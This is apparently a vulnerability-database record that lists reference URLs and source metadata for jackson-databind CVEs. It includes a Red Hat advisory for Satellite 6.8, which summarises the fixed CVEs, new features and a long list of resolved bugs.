"url": "https://access.redhat.com/security/cve/cve-2022-26373"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2938"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1355"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27404"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32189"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0909"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1048"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22662"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26700"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36516"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35527"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0561"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0924"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2880"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23960"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35525"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0908"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1586"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29581"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26719"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-34903"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0561"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1184"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1897"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21499"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35527"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2639"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1292"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21628"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30293"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27664"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-37603"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-37136"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-46877"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40149"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.amq.streams\u0026version=2.4.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-37136"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-0341"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-37137"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24823"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42004"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40150"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-40149"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42003"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:3223"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-37137"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-36944"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-1370"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-46877"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-36944"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-40150"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24823"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-0833"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-0833"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-1370"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0341"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:2312"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.2_release_notes/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29582"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-40690"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-25122"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22060"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22573"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-25122"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-2471"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26336"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22119"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-24122"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.11/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22569"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22970"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.fuse\u0026version=7.11.0"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7020"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22119"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23913"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-35517"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-35516"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33813"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21724"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22950"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22932"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30126"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22978"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33037"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-25329"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-42340"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3642"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3859"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30640"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-4178"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22971"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22096"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3807"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-41079"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-38153"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15250"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23181"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15250"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22096"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22976"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22573"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7020"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22968"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1319"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24614"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25689"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22569"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23596"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25689"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-24122"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36090"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23221"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22060"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9484"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43859"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26520"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-2471"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-42550"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9484"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-41766"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29505"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29582"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1259"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-35515"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5532"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3644"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-415522"
},
{
"db": "VULMON",
"id": "CVE-2020-36518"
},
{
"db": "PACKETSTORM",
"id": "168621"
},
{
"db": "PACKETSTORM",
"id": "178714"
},
{
"db": "PACKETSTORM",
"id": "169729"
},
{
"db": "PACKETSTORM",
"id": "169727"
},
{
"db": "PACKETSTORM",
"id": "170162"
},
{
"db": "PACKETSTORM",
"id": "172453"
},
{
"db": "PACKETSTORM",
"id": "172220"
},
{
"db": "PACKETSTORM",
"id": "167841"
},
{
"db": "NVD",
"id": "CVE-2020-36518"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-415522",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-36518",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168621",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "178714",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169729",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169727",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170162",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "172453",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "172220",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167841",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-36518",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-03-11T00:00:00",
"db": "VULHUB",
"id": "VHN-415522",
"ident": null
},
{
"date": "2022-03-11T00:00:00",
"db": "VULMON",
"id": "CVE-2020-36518",
"ident": null
},
{
"date": "2022-10-05T14:25:53",
"db": "PACKETSTORM",
"id": "168621",
"ident": null
},
{
"date": "2024-05-23T14:01:51",
"db": "PACKETSTORM",
"id": "178714",
"ident": null
},
{
"date": "2022-11-04T13:44:06",
"db": "PACKETSTORM",
"id": "169729",
"ident": null
},
{
"date": "2022-11-04T13:43:44",
"db": "PACKETSTORM",
"id": "169727",
"ident": null
},
{
"date": "2022-12-08T16:34:22",
"db": "PACKETSTORM",
"id": "170162",
"ident": null
},
{
"date": "2023-05-18T13:50:51",
"db": "PACKETSTORM",
"id": "172453",
"ident": null
},
{
"date": "2023-05-09T15:20:56",
"db": "PACKETSTORM",
"id": "172220",
"ident": null
},
{
"date": "2022-07-27T17:27:19",
"db": "PACKETSTORM",
"id": "167841",
"ident": null
},
{
"date": "2022-03-11T07:15:07.800000",
"db": "NVD",
"id": "CVE-2020-36518",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-11-29T00:00:00",
"db": "VULHUB",
"id": "VHN-415522",
"ident": null
},
{
"date": "2022-11-29T00:00:00",
"db": "VULMON",
"id": "CVE-2020-36518",
"ident": null
},
{
"date": "2025-08-27T21:15:36.420000",
"db": "NVD",
"id": "CVE-2020-36518",
"ident": null
}
]
},
"title": {
"_id": null,
"data": "Red Hat Security Advisory 2022-6783-01",
"sources": [
{
"db": "PACKETSTORM",
"id": "168621"
}
],
"trust": 0.1
},
"type": {
"_id": null,
"data": "code execution, xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "168621"
},
{
"db": "PACKETSTORM",
"id": "169729"
},
{
"db": "PACKETSTORM",
"id": "169727"
}
],
"trust": 0.3
}
}
VAR-202003-1777
Vulnerability from variot - Updated: 2026-03-09 20:08FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.aoju.bus.proxy.provider.remoting.RmiProvider (aka bus-proxy). FasterXML jackson-databind Exists in an unreliable data deserialization vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. There is a code problem vulnerability in org.aoju.bus.proxy.provider.remoting.RmiProvider in FasterXML jackson-databind 2.x version before 2.9.10.4. A remote attacker could exploit this vulnerability with specially crafted input to execute arbitrary code on the system. You must be logged in to download the update. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: Satellite 6.8 release Advisory ID: RHSA-2020:4366-01 Product: Red Hat Satellite 6 Advisory URL: https://access.redhat.com/errata/RHSA-2020:4366 Issue date: 2020-10-27 CVE Names: CVE-2018-3258 CVE-2018-11751 CVE-2019-12781 CVE-2019-16782 CVE-2020-5216 CVE-2020-5217 CVE-2020-5267 CVE-2020-7238 CVE-2020-7663 CVE-2020-7942 CVE-2020-7943 CVE-2020-8161 CVE-2020-8184 CVE-2020-8840 CVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10693 CVE-2020-10968 CVE-2020-10969 CVE-2020-11619 CVE-2020-14061 CVE-2020-14062 CVE-2020-14195 CVE-2020-14334 CVE-2020-14380 ==================================================================== 1. Summary:
An update is now available for Red Hat Satellite 6.8 for RHEL 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Satellite 6.7 - noarch, x86_64 Red Hat Satellite Capsule 6.8 - noarch, x86_64
- Description:
Red Hat Satellite is a systems management tool for Linux-based infrastructure. It allows for provisioning, remote management, and monitoring of multiple Linux deployments with a single centralized tool.
Security Fix(es):
- mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018) (CVE-2018-3258)
- netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling (CVE-2020-7238)
- rubygem-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser (CVE-2020-7663)
- puppet: puppet server and puppetDB may leak sensitive information via metrics API (CVE-2020-7943)
- jackson-databind: multiple serialization gadgets (CVE-2020-8840 CVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10968 CVE-2020-10969 CVE-2020-11619 CVE-2020-14061 CVE-2020-14062 CVE-2020-14195)
- foreman: unauthorized cache read on RPM-based installations through local user (CVE-2020-14334)
- Satellite: Local user impersonation by Single sign-on (SSO) user leads to account takeover (CVE-2020-14380)
- Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS (CVE-2019-12781)
- rubygem-rack: hijack sessions by using timing attacks targeting the session id (CVE-2019-16782)
- rubygem-secure_headers: limited header injection when using dynamic overrides with user input (CVE-2020-5216)
- rubygem-secure_headers: directive injection when using dynamic overrides with user input (CVE-2020-5217)
- rubygem-actionview: views that use the
jorescape_javascriptmethods are susceptible to XSS attacks (CVE-2020-5267) - puppet: Arbitrary catalog retrieval (CVE-2020-7942)
- rubygem-rack: directory traversal in Rack::Directory (CVE-2020-8161)
- rubygem-rack: percent-encoded cookies can be used to overwrite existing prefixed cookie names (CVE-2020-8184)
- hibernate-validator: Improper input validation in the interpolation of constraint error messages (CVE-2020-10693)
- puppet-agent: Puppet Agent does not properly verify SSL connection when downloading a CRL (CVE-2018-11751)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
-
Provides the Satellite Ansible Modules that allow for full automation of your Satellite configuration and deployment.
-
Adds ability to install Satellite and Capsules and manage hosts in a IPv6 network environment
-
Ansible based Capsule Upgrade automation: Ability to centrally upgrade all of your Capsule servers with a single job execution.
-
Platform upgrades to Postgres 12, Ansible 2.9, Ruby on Rails and latest version of Puppet
-
Support for HTTP UEFI provisioning
-
Support for CAC card authentication with Keycloak integration
-
Add ability to upgrade Red Hat Enterprise Linux 7 hosts to version 8 using the LEAPP based tooling.
-
Support for Red Hat Enterprise Linux Traces integration
-
satellite-maintain & foreman-maintain are now self updating
-
Notifications in the UI to warn users when subscriptions are expiring.
The items above are not a complete list of changes. This update also fixes several bugs and adds various enhancements. Documentation for these changes is available from the Release Notes document linked to in the References section.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1160344 - [RFE] Satellite support for cname as alternate cname for satellite server
1261802 - [RFE] Make the foreman bootdisk full-host image work on UEFI systems
1300211 - capsule-certs-generate failed to increment release number when generating certificate rpm for foreman-proxy
1332702 - smart-proxy-openscap-send with additional features - alert if file corrupt
1398317 - For the vms built by Satellite 6 using "Network Based" installation mode on VMWare, unable to change the boot sequence via BIOS
1410616 - [RFE] Prominent notification of expiring subscriptions.
1410916 - Should only be able to add repositories you have access to
1429033 - Host provisioned with RHEL Workstation OS, after provisioning displayed as generic RedHat 7.3
1461781 - [RFE]A button should be available in the GUI to clear the recurring logics.
1469267 - need updated rubygem-rake
1486446 - Content view versions list has slow query for package count
1486696 - 'hammer host update' removes existing host parameters
1494180 - Sorting by network address for subnet doesn't work properly
1501499 - tomcat listens to 0.0.0.0 for serving requests but just needs localhost
1503037 - [RFE] Cancelled future/recurring job invocations should not get the status "failed" but rather "cancelled"
1505842 - Remote Execution engine: Error initializing command: Net::SSH::HostKeyMismatch - fingerprint 20:a9:b7:45:1a:b7:d6:42:1e:03:d1:1f:06:20:4c:e2 does not match for "172.17.0.101"
1531674 - Operating System Templates are ordered inconsistently in UI.
1537320 - [RFE] Support for Capsules at 1 version lower than Satellite
1543316 - Satellite 6.2 Upgrade Fails with error "rake aborted! NoMethodError: undefined method first' for nil:NilClass" when there are custom bookmarks created
1563270 - Sync status information is lost after cleaning up old tasks related to sync.
1569324 - Webrick is unable to use 2 supported TLS v1.2 ciphers ('ECDHE-RSA-AES128-GCM-SHA256', 'ECDHE-RSA-AES256-GCM-SHA384')
1571907 - Passenger threads throwing tracebacks on API jobs after spawning
1576859 - [RFE] Implement automatic assigning subnets through data provided by facter
1584184 - [RFE] The locked template is getting overridden by default
1601101 - [RFE] Add autofill functionality to the Job invocation Search query box, copy from Hosts search box
1607706 - [RFE] Add support for --vlanid in Satellite Kickstart Default provisioning template
1608001 - Rearrange search/filter options on Red Hat Repositories page.
1613391 - race condition on removing multiple organizations simultaneously
1619274 - [RFE] Red Hat Satellite should now be able to discover and provision bare metal machines via UEFI HTTP boot
1619422 - User Agent for Downstream RSS feed still says Foreman and Foreman Version
1620214 - Page should auto-refresh after subscriptions have been modified on the Satellite webui
1624049 - Changing the organization in the Satellite WebUI does not change the sync plan page information from the previous organization
1625258 - Having empty "Allocation (GB)" when creating a new Host, nil:NilClass returned on creating the Host
1627066 - Unable to revert to the original version of the provisioning template
1630433 - [RFE] Include Ansible Satellite modules with Ansible Core modules
1630536 - yum repos password stored as cleartext
1632577 - Audit log show 'missing' for adding/removing repository to a CV
1640615 - CVE-2018-3258 mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018)
1645062 - host_collection controller responds with 200 instead of 201 to a POST request
1645749 - repositories controller responds with 200 instead of 201 to a POST request
1647216 - Lack of edit_smart_proxies permission causes error when setting host to Build
1647364 - [RFE] Extend the audits by the http request id
1647781 - Audits contain no data (Added foo to Missing(ID: x))
1651297 - Very slow query when using facts on user roles as filters
1653217 - [RFE] More evocative name for Play Ansible Roles option?
1654347 - Satellite may create duplicate CreateRssNotifications tasks after restarting foreman tasks
1654375 - [RFE] Mention specifically uder the admin chexbox for AD LDAP user if its created with admin role,
1659418 - katello-tracer-upload failing with error "ImportError: No module named katello"
1665277 - subscription manager register activation key with special character failed
1665893 - candlepin refuses to start or hangs periodically when having too many messages in ActiveMQ journal
1666693 - Command "hammer subscription list" is not correctly showing the comment "Guests of " in the "Type" field in the output.
1677907 - Ansible API endpoints return 404
1680157 - [RFE] Puppet 'package' provider type does not support selecting modularity streams
1680458 - Locked Report Templates are getting removed.
1680567 - Reporting Engine API to list report template per organization/location returns 404 error
1681619 - [RFE] Disable the option to enter a MAC address after selecting a compute resource while creating new hosts through Satellite
1685949 - [RFE] Support passing of attribute name instead of Id's in RHV workflow
1687116 - kernel version checks should not use /lib/modules to determine running version
1688886 - subscription-manager not attaching the right quantity per the cpu core
1691416 - Delays when many clients upload tracer data simultaneously
1697476 - [RFE] To be able to see the name of the provisioning template being used to build a host from the host itself
1702434 - foreman-bootloaders-redhat-tftpboot expected file permissions in package don't match runtime permissions
1705097 - An empty report file doesn't show any headers
1709557 - [RFE] warn the user if they have done a select all and it includes the restart|reboot service
1709842 - Tracer shows the machines needs rebooting even after reboot if kernel-debug is installed
1710511 - Filter by os_minor includes unexpected values on the Satellite web UI.
1715999 - Use Infoblox API for DNS conflict check and not system resolver
1716423 - Nonexistent quota can be set
1717403 - Broken breadcrumbs link to compute resource VM list on VM detail page
1718012 - [RFE] Add a hard limit of 100 items to restrict any fact child-hash/array
1718954 - [RFE] When the contentAccessMode is set to org_environment for an owner, we should disable auto-attach globally
1719509 - [RFE] "hammer host list" including erratas information
1719516 - [RFE] "hammer host-collection hosts" including erratas information
1720725 - [RFE] Ability to override DHCP options and wait_after_restart option for race condition
1721419 - SSH key cannot be added when FIPS enabled
1722954 - Slow performance when running "hammer host list" with a high number of Content Hosts (15k+ for example)
1723313 - foreman_tasks:cleanup description contain inconsistent information
1724494 - [Capsule][smart_proxy_dynflow_core] "PID file /var/run/foreman-proxy/smart_proxy_dynflow_core.pid not readable (yet?) after start"
1724497 - CVE-2019-12781 Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS
1726768 - [RFE] Red Hat Satellite 6 GUI, Tasks should show Full name
1729968 - Editing disk size of a Compute Profile for a VMware Compute Resource makes the whole Storage section disappear
1730083 - [RFE] Add Jobs button to host detail page
1731155 - Cloud init template missing snippet compared to Kickstart default user data
1731229 - podman search against Red Hat Satellite 6 fails.
1731235 - [RFE] Create Report Template to list inactive hosts
1733241 - [RFE] hammer does not inherit parent location information
1733650 - Satellite receives RPM1004 pulp error and 403 Forbidden http error retrieving packages from CDN
1736809 - undefined methodsplit' for nil:NilClass when viewing the host info with hammer
1737135 - Content Hosts loses subscriptions after Vmotion and auto attach is unable to assigned the subscriptions if any other subscription is already attached to the host.
1737564 - [RFE] Support custom images on Azure
1738548 - Parameter --openscap-proxy-id is missing in hammer host create command.
1740943 - Increasing Ansible verbosity level does not increase the verbosity of output
1743056 - While creating a host for a particular location, all the domains are in the pull down list, even if only one domain is selected for that location.
1743776 - Error while deleting the content view version.
1745516 - Multiple duplicate index entries are present in candlepin database
1746936 - satellite6 is not using remote execution by default even after setting remote execution by default from satellite web-UI.
1749692 - Default Rhel8 scap content does not get populated on the Satellite
1749916 - [RFE] Satellite should support certificates with > 2048 Key size
1751981 - Parent object properties are not propagated to Child objects in Location and Host Group
1752880 - katello-host-tools-tracer stats paths abusively, leading to a hang or slowness of yum command
1753551 - Traces output from Satellite GUI has mismatches with client tracer output
1756991 - 2 inputs with same name -> uninitialized constant #::NonUniqueInputsError
1757317 - [RFE] Dynflow workers extraction
1757394 - [BUG] Non-admin users always get "Missing one of the required permissions" message while accessing their own table_preferences via Satellite 6 API
1759160 - Rake task for cleaning up DHCP records on proxy
1761872 - Disabled buttons are still working
1763178 - [RFE] Unnecessary call to userhelp and therefore log entries
1763816 - [RFE] Report which users access the API
1766613 - Fact search bar broken and resets to only searching hostname
1766906 - Associating more than 10 Ansible roles to a Host only sets based on the per-page setting
1767497 - Compute Resource filter does not correctly allow Refresh Cache
1767635 - [RFE] Enable Organization and Location to be entered not just selected
1770366 - [RFE] Improve upgrade efficiency by moving RPM post-installation scripts to the installer.
1770544 - Puppet run job notification do not populate "%{puppet_options}"' value
1770777 - Changing concurrency level while executing Ansible jobs fail with NoMethodError: undefined method []' for nil:NilClass
1771367 - undefined methodrequest_uri' when Openidc Provider Token Endpoint is none
1771428 - Openscap documentation link on Satellite 6 webui is broke
1771484 - Client side documentation links are not branded
1771693 - 'Deployed on' parameter is not listed in API output
1772381 - Incorrect example to use multiple attributes as a matcher key in the tooltip for Order
1772517 - login with the user name as same as existing user group gives 500 ISE and wont allow user to login again
1772544 - Use APIv4 is not the default when creating a new compute resource in ovirt
1773298 - GET /katello/api/srpms/compare always fails with error: Missing template katello/api/v2/common/compare
1774710 - UI: When selecting the server type in ldap authentication, "attribute mappings" fields could be populated automatically
1778396 - exporting/importing report template process is causing a different report during the visualization (blank lines)
1778503 - Prepended text on OS name creation
1778681 - Some pages are missing title in html head
1779638 - Unable to filter/search http-proxies using Organization/Location for Satellite UI.
1781671 - While using concurrency_level in remote execution, job progress in WebUI is not being updated properly
1782352 - [RHEL 8.1 client] All packages are not getting updated after click on "Update All Packages"
1782426 - Viewing errata from a repository returns incorrect unfiltered results
1783568 - [RFE] - Bulk Tracer Remediation
1783882 - Ldap refresh failed with "Validation failed: Adding would cause a cycle!"
1784012 - Default kickstart places log to /mnt/sysimage/root/install.post.log
1784341 - disable CertificateRevocationListTask job in candlepin.conf by default
1785117 - [RFE] Add functionality in foreman logging to hash-out or mark as [FILTERED] the password in /var/log/foreman-maintain/foreman-maintain.log and /var/log/foreman-installer/satellite.log file
1785231 - Ansible Variable override to false does not gets reflected on client machine on Red Hat Satellite 6.
1785624 - [UI] Importing templates with associate 'never' is not resulting as expected
1785683 - Does not load datacenter when multiple compute resources are created for same VCenter
1785902 - Ansible RunHostJob tasks failed with "Failed to initialize: NoMethodError - undefined method []' for nil:NilClass"
1785940 - [RFE] Reporting template should allow host filtering based on applicable errata issue date
1787329 - change filename in initrd live CPIO archive to fdi.iso
1788261 - CVE-2018-11751 puppet-agent: Puppet Agent does not properly verify SSL connection when downloading a CRL
1788958 - [RFE] add "elapsed time" column to export and hammer, make it filterable in WebUI
1789006 - Smart proxy dynflow core listens on 0.0.0.0
1789100 - CVE-2019-16782 rubygem-rack: hijack sessions by using timing attacks targeting the session id
1789434 - Template editor not always allows refreshing of the preview pane
1789522 - On unhealthy Satellite, dynflow_envelopes table might grow indefinitely
1789686 - Non-admin user with enough permissions can't generate report of applicable errata
1789815 - The "start" parameter should be mentioned inside "--compute-attributes:" in hammer_cli for Satellite 6
1789911 - "foreman-rake katello:publish_unpublished_repositories" is referring to column which no longer exists in katello_repositories table.
